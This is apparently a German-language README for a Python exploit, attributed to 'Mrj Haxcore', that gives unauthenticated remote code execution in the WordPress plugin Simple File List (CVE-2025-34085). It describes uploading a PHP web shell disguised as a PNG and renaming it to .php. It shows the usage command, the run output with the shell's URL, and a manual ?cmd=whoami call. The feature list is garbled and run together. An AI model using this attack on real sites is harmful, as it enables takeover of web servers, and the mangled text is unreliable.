
Simple File List – RCE-Exploit ohne Authentifizierung (CVE-2025-34085)
⚠️ Exploit-Code von: Mrj Haxcore
Ein voll funktionsfähiger Python-Exploit für das WordPress-Plugin Simple File List (<= 4.2.3), das aufgrund unsicherer Datei-Upload- und Umbenennungslogik anfällig für authentifizierungsfreie Remote-Code-Ausführung (RCE) ist.
simple-file-list).png getarnte PHP-Datei hochladen, sie in .php umbenennen und beliebigen Code ausführen.multipart/form-data-Builder (umgeht 415).php, .php5, .phtml usw.?cmd=�PNG-Müll)python3 simple.py https://ziel.seite
[+] Shell wird als 8dkls0qp.png hochgeladen...
[+] Hochladen erfolgreich.
[+] Versuche, in 8dkls0qp.php umzubenennen...
[+] Umbenennung erfolgreich: 8dkls0qp.php
[+] Shell wird ausgelöst: https://ziel.seite/wp-content/uploads/simple-file-list/8dkls0qp.php?cmd=id
[+] Shell-Ausgabe:
uid=33(www-data) gid=33(www-data) groups=33(www-data)
Manueller Aufruf
https://ziel.seite/wp-content/uploads/simple-file-list/8dkls0qp.php?cmd=whoami